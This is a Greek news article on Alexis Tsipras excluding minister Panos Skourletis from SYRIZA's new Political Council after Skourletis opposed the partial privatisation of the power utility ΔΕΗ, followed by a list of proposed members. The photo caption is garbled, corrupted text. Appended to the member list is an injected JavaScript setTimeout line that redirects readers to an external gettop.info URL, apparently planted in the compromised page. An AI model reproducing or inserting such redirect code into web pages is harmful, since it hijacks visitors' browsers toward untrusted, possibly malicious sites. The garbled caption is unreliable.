Ο Τσίπρας έκοψε από το Πολιτικό Συμβούλιο τον Σκουρλέτη, που διαφωνεί με την ιδιωτικοποίηση της ΔΕΗ

0
11
2�񩯠�ӕщƁ 󴩲 壪ᴡ󴜳婲 �Ӵ᤟ﵠTae Kwon Do, 󴯠С롩�񯬠�Н찴砱3 Ϫ�߯�16. (EUROKINISSI/ÉّÏӠʏ͔QɍǓ)

 

Ο Αλέξης Τσίπρας έκοψε από το νέο καθοδηγητικό όργανο του Σύριζα τον Πάνο Σκουρλέτη, γεγονός που από πολλούς ερμηνεύεται και ως προαναγγελία απομάκρυνσής του και από την κυβέρνηση, λόγω της διαφωνίας του με την ιδιωτικοποίηση 17% της ΔΕΗ.

Ο πρωθυπουργός πρότεινε συνολικά 11 πρόσωπα, αλλά σε αυτά δεν συμπεριέλαβε τον υπουργό Περιβάλλοντος και Ενέργειας, ούτε τον υπουργό Ναυτιλίας Θόδωρο Δρίτσα.

Σε ερωτήσεις δημοσιογράφων για το ενδεχόμενο αφαίρεσης της αρμοδιότητας της Ενέργειας από το υπουργείο του, ο κ. Σκουρλέτης είπε ότι σε μια τέτοια περίπτωση θα προτιμήσει να πάει σπίτι του. Το ίδιο απάντησε και στο ερώτημα αν δέχεται να πάει σε άλλο υπουργείο.

Ο πρωθυπουργός πρότεινε για το υπό συγκρότηση Πολιτικό Συμβούλιο τον Γιάννη Δραγασάκη, τον Ευκλείδη Τσακαλώτο, τον Νίκο Παππά, τον Νίκο Φίλη, τη Ρένα Δούρου, τον Γιάννη Μπαλάφα, την Όλγα Γεροβασίλη, τον διευθυντή του γραφείου του Δημήτρη Τζανακόπουλο, την εκπρόσωπο του Σύριζα, Ράνια Σβίγγου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here